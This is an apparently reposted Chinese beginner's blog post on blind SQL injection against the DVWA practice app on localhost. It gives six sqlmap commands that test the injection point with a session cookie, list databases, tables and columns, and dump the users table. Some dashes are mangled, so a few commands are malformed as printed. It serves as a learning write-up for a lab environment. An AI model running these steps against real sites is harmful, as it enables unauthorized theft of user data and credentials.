1. 程式人生 > >我的學習之路(一)SQL盲註學習篇

我的學習之路(一)SQL盲註學習篇

網絡安全 dvwa sql盲註

我的學習之路,現在零基礎,是一個小白,請各位大牛批評指正!寫下這篇,是對自己的一個思路的整理,僅供參考。

Dvwa中登錄進入,首先在DVWA Security中設置等級為low,然後進入SQL Injection(blind),隨意輸入一個數字進行抓包,然後找到URL註入點和cookie。(抓包使用的工具為fiddler,在此就不進行詳述抓包過程了)

技術分享


然後進入cmd界面進行命令參數輸入:

第一步查詢該URL是否可進行註入,命令參數如下:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6"

-u參數為指定URL --cookie="cookie值"

技術分享

結果發現是可以進行註入的。

第二步查看所有的數據庫:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –dbs

技術分享

第三步查看當前用戶:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –current-user

技術分享

第四步查看數據庫dvwa中所有的表:

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa --tables

技術分享

第五步查看數據庫中的users表,其中—columns為查看當前表的所有列

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--columns

技術分享

各位經過前面的步驟是不是等的沒有耐心了,哈哈,但是結果出來,還是有成就感的哦。第六步,也就是最後一步,--dump 將所有列的信息都列出來。

sqlmap.py –u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9gakv1caa8u351290s6bupeqt6" –D dvwa –T users--dump

技術分享

當然,最後一張圖沒有截成完整圖哦,你可以繼續回車的!!


本文出自 “學習之旅思路整理” 博客,請務必保留此出處http://pieshusheng.blog.51cto.com/13106113/1946399

我的學習之路(一)SQL盲註學習篇